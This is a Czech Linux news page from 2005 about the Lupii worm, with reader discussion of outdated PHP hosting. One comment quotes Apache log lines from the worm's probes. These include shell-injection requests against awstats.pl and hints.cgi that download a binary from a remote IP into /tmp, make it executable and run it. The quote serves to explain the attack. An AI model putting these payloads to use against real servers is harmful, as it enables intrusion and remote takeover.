abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
Přihlášení | Registrace
×
napište » Zprávičky
inzerujte » Pracovní nabídky
    V neděli 30. června skončí (EOL) podpora CentOS Linux 7
    dnes 13:11 | Upozornění

    V neděli 30. června skončí (EOL) podpora CentOS Linux 7.

    Ladislav Hagara | Komentářů: 10
    Shrnutí vývoje frameworku pro zpracování obrazu G'MIC za poslední rok
    dnes 10:44 | Zajímavý článek

    David Tschumperlé a Garry Osgood v obšírném článku se spoustou náhledů shrnují vývoj multiplatformního svobodného frameworku pro zpracování obrazu G'MIC (GREYC's Magic for Image Computing, Wikipedie) za poslední rok.

    Ladislav Hagara | Komentářů: 2
    Andrew S. Tanenbaum oceněn ACM za MINIX
    včera 13:22 | IT novinky

    Andrew S. Tanenbaum byl oceněn 2023 ACM Software System Award (Wikipedie) za operační systém MINIX.

    Ladislav Hagara | Komentářů: 1
    Celkový počet stažení aplikací z Flathubu překročil 2 miliardy
    včera 10:22 | Komunita

    Celkový počet stažení aplikací z Flathubu překročil 2 miliardy. Aktuální Statistiky Flathubu: Celkový počet stažení 2 002 793 783. Celkem desktopových aplikací 2 636.

    Ladislav Hagara | Komentářů: 15
    darktable 4.8.0
    21.6. 23:33 | Nová verze

    Byla vydána nová verze 4.8.0 programu na úpravu digitálních fotografií darktable (Wikipedie).

    Ladislav Hagara | Komentářů: 0
    MagPi 142 a HackSpace 79
    21.6. 23:11 | Zajímavý článek

    Nová čísla časopisů od nakladatelství Raspberry Pi: MagPi 142 (pdf) a HackSpace 79 (pdf).

    Ladislav Hagara | Komentářů: 0
    Qtractor 1.0.0
    21.6. 18:22 | Nová verze

    Qtractor (Wikipedie) dospěl do verze 1.0.0. Jedná se o Audio/MIDI vícestopý sekvencer.

    Ladislav Hagara | Komentářů: 0
    OnlyOffice Docs 8.1
    21.6. 14:33 | Nová verze

    Byl vydán svobodný kancelářský balík OnlyOffice Docs 8.1. Vedle četných oprav přináší několik funkcí včetně podpory editace textu v PDF a vytváření formulářů v PDF.

    Fluttershy, yay! | Komentářů: 50
    22 734 her na Steamu používá curl
    21.6. 12:33 | Zajímavý článek

    Daniel Stenberg, autor nástroje curl, z databáze SteamDB zjistil, že aktuálně 22 734 her na Steamu používá curl.

    Ladislav Hagara | Komentářů: 5
    Claude 3.5 Sonnet
    20.6. 19:55 | IT novinky

    Společnost Anthropic vydala Claude 3.5 Sonnet, tj. novou verzi své umělé inteligence Claude (Wikipedie). Videoukázky na YouTube. S Claude 3, stejně jak s GPT-3.5, Llama 3 a Mixtral, si lze pokecat bez přihlašování na DuckDuckGo AI Chat.

    Ladislav Hagara | Komentářů: 0
    Centrum | Napsat | Starší
    Rozcestník
    AbcLinuxu
    HDmag.cz
    AbcLinuxu:/ Zprávičky / Blíží se doba linuxových červů
    Štítky: kernel, Linux

    Blíží se doba linuxových červů

    Luppi Worm je očividná cesta s ohromnými možnostmi pro útočníky. V příštích měsicích se tak možná přesvědčíme, jak bezpečné vlastně ve skutečnosti linuxové systém jsou. Více na eWeeku v článku Is This the Dawn of the Linux Worms?

    10.11.2005 08:27 | Pavel 'lingeek' Szalbot | Zajímavý článek


    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    Komentáře

    Nástroje: Začni sledovat (0) ?Zašle upozornění na váš email při vložení nového komentáře. , Tisk

    Vložit další komentář

    10.11.2005 09:07 Robert Krátký | skóre: 94 | blog: Robertův bloček
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Doporučuji Media Giddy over Linux Worm.
    10.11.2005 13:41 lukas.ramlich | skóre: 3 | blog: linux_a_ja
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Už se těším, až někdo vypustí nějakého schopného červa. Konečně snad přejde většina webhosterů na PHP5 :)

    Hodně provozovatelů webhostingu totiž kdysi před 5 lety něco nainstalovalo a protože nechtějí "buzerovat" své zákazníky, pěkně tuto zastaralou konfiguraci udržují v chodu, nehledě na nové verze a nové bugy.

    Naposledy jsem potkal starou verzi u Active24. Nakopíruju skript, nefunguje. Podívám se na verzi PHP a co nevidím Debian Woody a PHP v4.1.2! Zastaralý Debian a 3 roky staré PHP. Ani nechci zkoumat, jestli na něj ještě vycházejí nějaké backporty bezpečnostních updatů...

    Jak to vypadá u ostatních mě snad už ani nezajímá.
    10.11.2005 15:56 Sofr
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Ja bych podle http://www.debian.org/releases/woody/, konkretne "The security team has announced that it will continue to provide security updates for Debian GNU/Linux 3.0 (woody) until May 2006 or until security support for etch (the release following sarge) starts." rekl, ze security updaty zatim vychazeji. Ale osobne tedy Woodyho nikde nemam, takze z vlastni zkusenosti to potvrdit nemohu.

    Ovsem pokud na nej updaty vychazeji, pak na pouzivani starych verzi nic spatneho nevidim a Vas odsuzujici ton se mi prilis nelibi.
    10.11.2005 16:30 #Tom
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Na používání starých, ovšem záplatovaných verzí sice nic špatného není, ale dobrého také ne. Zrovna PHP 5 by mi docela chybělo.
    10.11.2005 16:19 Ctirad Feřtr | skóre: 43 | Praha
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Mohl by někdo pár větami shrnout, čeho se vlastně tímto červem zneužitelná chyba týká a co je tedy potřeba záplatovat? Z těch pár útržků co jsem pochopil to není chyba v linuxu (jako tvrdí někde), ani v žádném webserveru (jak tvrdí někde jinde), ale v nějkém modulu pro PHP (jestli se vyjadřuju blbě, tak sorry, web ani php není moje parketa). Jelikož žádný webserver neprovozuji, tak mě to netrápí, ale chtěl bych vědět jak to vlastně je.
    11.11.2005 10:13 Milan Hejpetr | skóre: 25 | blog: poznamky | Plzen
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Viz napr. http://www.symantec.com/avcenter/venc/data/linux.plupii.html

    Jinak v logu Apache to vypada napr. takto (kraceno):
    ...
    64.76.125.141 - - [09/Nov/2005:20:00:36 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286
    64.76.125.141 - - [09/Nov/2005:20:00:38 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 291
    64.76.125.141 - - [09/Nov/2005:20:00:39 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 298
    64.76.125.141 - - [09/Nov/2005:20:00:41 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 299
    64.76.125.141 - - [09/Nov/2005:20:00:42 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 293
    64.76.125.141 - - [09/Nov/2005:20:00:43 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 299
    64.76.125.141 - - [09/Nov/2005:20:00:45 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 296
    64.76.125.141 - - [09/Nov/2005:20:00:49 +0100] "POST /xmlrpc.php HTTP/1.1" 404 286
    64.76.125.141 - - [09/Nov/2005:20:00:50 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 293
    64.76.125.141 - - [09/Nov/2005:20:00:52 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 293
    ...
     Pak je zajimave jeste napr. toto :-)
    ...
    64.76.125.141 - - [09/Nov/2005:20:00:31 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3b
    chmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 294
    ...
    ...
    64.76.125.141 - - [09/Nov/2005:20:03:40 +0100] "GET /scgi-bin/hints/hints.cgi?|cd$IFS/tmp;wget$IFS`echo$IFS\"$IFS\"`62.101.193.244/lupii;
    chmod$IFS+x$IFS`echo$IFS\"$IFS\"`lupii;./lupii`echo$IFS\"$IFS\"`62.101.193.244| HTTP/1.1" 404 300 ...
    Luboš Doležel (Doli) avatar 10.11.2005 16:39 Luboš Doležel (Doli) | skóre: 98 | blog: Doliho blog | Kladensko
    Rozbalit Rozbalit vše Re: Blíží se doba linuxových červů
    Kdo se tímhle nechá nakazit a útočník se úspěšně zvěnčí dostane do jeho systému musí být blbec a snad si ani nezaslouží mít práci jako admin.

    Založit nové vláknoNahoru


    Píšeme jinde
    ISSN 1214-1267   www.czech-server.cz
    Redakce | Inzerce | Podmínky použití | Osobní údaje
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.